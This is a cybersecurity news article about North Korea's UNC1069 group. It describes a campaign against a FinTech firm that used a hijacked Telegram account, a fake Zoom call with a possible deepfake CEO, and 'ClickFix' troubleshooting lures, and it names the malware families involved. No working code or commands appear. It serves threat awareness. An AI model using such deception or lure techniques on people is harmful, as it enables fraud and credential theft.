Deepfakes, Deception, and Data Theft: How North Korea’s UNC1069 Is Hijacking Financial Firms

When a cryptocurrency executive joined a seemingly routine Zoom call, they had no idea they were stepping onto a digital minefield. The meeting host - a familiar industry figure - spoke with conviction, but behind the screen lurked not a trusted peer, but a North Korean cybercrime syndicate armed with deepfake technology, cutting-edge malware, and a ruthless appetite for digital gold.

According to a recent Mandiant investigation, UNC1069 has upped the ante in cybercrime, pivoting from conventional phishing to highly tailored, AI-powered deception. Their latest campaign targeted a FinTech company, beginning with the compromise of a Telegram account belonging to a senior executive. After weeks of rapport-building, the attackers sent a Calendly link that directed the unsuspecting victim to a fake Zoom meeting, hosted on attacker-controlled infrastructure.

The sting’s masterstroke: an AI-generated deepfake of a well-known CEO. While the veracity of the deepfake remains unconfirmed, the strategy illustrates the group’s readiness to blend cutting-edge technology with psychological manipulation. During the meeting, audio “problems” were staged - prompting the victim to run “troubleshooting” commands. In reality, these were the opening moves of a sophisticated malware infection chain.

Mandiant analysts uncovered a digital arsenal: seven unique malware families, including DEEPBREATH, a Swift-based data miner that raids macOS credentials and browser data; CHROMEPUSH, a C++-based browser extension disguised as a Google Docs tool to steal keystrokes and cookies; and SILENCELIFT, a backdoor capable of hijacking Telegram communications. The only previously known tool, SUGARLOADER, was supplemented by these new, purpose-built weapons.

The attack method, dubbed “ClickFix,” exploits human trust and technical confusion. By simulating error messages and troubleshooting prompts, UNC1069 tricks users into executing the very code that infects them. This trend is gaining traction among advanced threat actors - especially as AI tools like Gemini streamline malware development and reconnaissance.

UNC1069’s focus is shifting: from broad phishing to precision strikes on centralized exchanges, software developers, and venture capital firms in the Web3 ecosystem. The group doesn’t just steal money - they harvest credentials and session data, laying groundwork for future infiltrations and identity-based scams.

As the line blurs between human and machine deception, the message for financial firms is clear: vigilance is no longer enough. In an era where attackers wield AI and deepfakes, every “routine” meeting could be a high-stakes con job - and every click could open the vault to tomorrow’s cyber heist.

WIKICROOK

• Deepfake: A deepfake is AI-generated media that imitates real people’s appearance or voice, often used to deceive by creating convincing fake videos or audio.
• Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.
• Command and Control (C&C): Command and Control (C&C) servers let attackers remotely control infected devices, send instructions, and collect stolen data from compromised systems.
• Session Token: A session token is a unique digital code that keeps users logged in to websites or apps. If stolen, attackers can access accounts without a password.
• Browser Extension: A browser extension is a small add-on that enhances browser features but can also be misused by hackers to steal data or spy on users.